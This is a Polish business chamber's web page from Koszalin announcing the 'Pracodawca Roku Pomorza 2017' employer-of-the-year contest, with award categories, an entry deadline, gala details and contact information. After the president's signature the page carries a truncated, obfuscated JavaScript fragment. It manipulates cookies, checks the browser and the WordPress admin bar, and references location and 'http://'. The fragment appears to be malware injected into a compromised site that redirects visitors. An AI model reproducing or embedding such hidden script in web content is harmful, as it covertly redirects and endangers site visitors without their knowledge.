| Północna Izba Gospodarcza w Koszalinie

Szanowni Państwo, Drodzy Przedsiębiorcy!

Północna Izba Gospodarcza w Koszalinie po raz pierwszy organizuje Konkurs Pracodawca Roku Pomorza 2017. Udział
w konkursie mogą wziąć udział nie tylko przedsiębiorcy zrzeszeni w Północnej Izbie Gospodarczej, ale również firmy nie będące członkami Izby z terenu Pomorza. Udział jest bezpłatny!

Członków PIG zachęcam nie tylko do zgłaszania swojego udziału w konkursie, jak i do rekomendacji firm które Waszym zdaniem powinny zostać nagrodzone i wyróżnione.

Pomorski rynek pracy w ostatnich latach silnie ewoluował, na co wpływ miały lokalne inwestycje zagraniczne, ujemna demografia, a także odpływ specjalistów za granicę i do innych ośrodków miejskich.
W regionie zaczęło brakować nie tylko specjalistów i rzemieślników, ale również pracowników biurowych, produkcyjnych i fizycznych. W rezultacie, zarządzanie zasobami ludzkimi, a zwłaszcza rekrutacja, utrzymanie i rozwój kadr, stały się dziś głównymi bolączkami pracodawców, którzy coraz mocniej konkurują ze sobą walcząc o wartościowych pracowników.

Szukając rozwiązania dla tych problemów, Północna Izba Gospodarcza w Koszalinie wraz z partnerami podjęła działania zaradcze w formie organizowanego po raz pierwszy plebiscytu na Pracodawcę Roku. Celem konkursu jest promowanie Pomorza jako regionu oferującego miejsca pracy w konkretnych przedsiębiorstwach, gwarantującym pracownikom sukces zawodowy i rozwój kariery.

Do konkursu może przystąpić samodzielnie każdy pracodawca zrzeszony w Północnej Izbie Gospodarczej lub otrzymał nominację zarówno od członka Kapituły Konkursu jak i od członka Północnej Izby Gospodarczej.
W konkursie mogą wziąć udział wszyscy przedsiębiorcy działający na terenie Pomorza, bez względu na to czy są członkami Północnej Izby Gospodarczej czy też nie będący. Dodatkowe informacje dotyczące regulaminu oraz ankiety zgłoszeniowej dostępne są na stronie www.pig.koszalin.pl/konkurs-pracodawca-roku

Ze względu na różnorodność i skalę problemów, związanych z dziedziną zarządzania kadrami
w przedsiębiorstwach, pracodawcy będą oceniani w trzech kategoriach:

Kategorie związane z wielkością zatrudnienia

I kategoria – zakłady pracy do 50 zatrudnionych

II kategoria – zakłady pracy od 51 do 250 zatrudnionych

III kategoria – zakłady pracy powyżej 250 zatrudnionych

Kategorie jakościowe

IV kategoria – społeczna odpowiedzialność biznesu – firma aktywna lokalnie oraz wykazująca dbałość
o środowisko w którym działa.

V kategoria – wyróżnienie dla szkoły lub wydziału uczelni współpracującej z biznesem

Potwierdzenie uczestnictwa firmy powinny dokonać do 15 sierpnia 2017 roku, wraz z wypełnioną ankietą . Udział w konkursie jest bezpłatny.

Laury naszego plebiscytu są doskonałą wskazówką dla osób poszukujących pracy. Tytuł „Pracodawcy Roku” jest gwarancją rzetelności przedsiębiorstwa dla szukających stałego zatrudnienia na godnych warunkach, podnosi rangę przedsiębiorstwa na rynku pracy i jest magnesem silnie przyciągającym najlepsze kadry.

Ponadto, chcemy docenić firmy, które w swojej codziennej pracy kierują się zasadami etyki i społecznej odpowiedzialności biznesu. Szczególnie zależy nam by firmy godne naśladowania wyszły z cienia i budowały markę gospodarczą naszego regionu.

Warto dodać, że ukoronowaniem plebiscytu będzie Gala Północnej Izby Gospodarczej w Koszalinie podczas której, nastąpi wręczenie statuetek „Pracodawca Roku Pomorza 2017” najlepszym pracodawcom
w regionie. Oczy pomorskiego biznesu skierowane będą w stronę zwycięzców, a swoją obecnością zaszczycą nas znamienici goście oraz przedstawiciele lokalnych władz i instytucji.

Wydarzenie będzie miało miejsce 9 września (sobota) w zabytkowym Bursztynowym Pałacu w Strzekęcinie opodal Koszalina.

Zgłoszenia przyjmuje Pani Dominika Wiśniewska z Biura Izby na adres e-mail: koszalin@izba.info.
W przypadku dodatkowych pytań lub wątpliwości proszę o kontakt z Panią Dominiką pod nr telefonu 94-341-10-83 l
ub  tel. kom. 733-837-300.

 

Z poważaniem

 

Roman Biłas

Prezes Północnej Izby Gospodarczej

Oddział w Koszalinie 'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m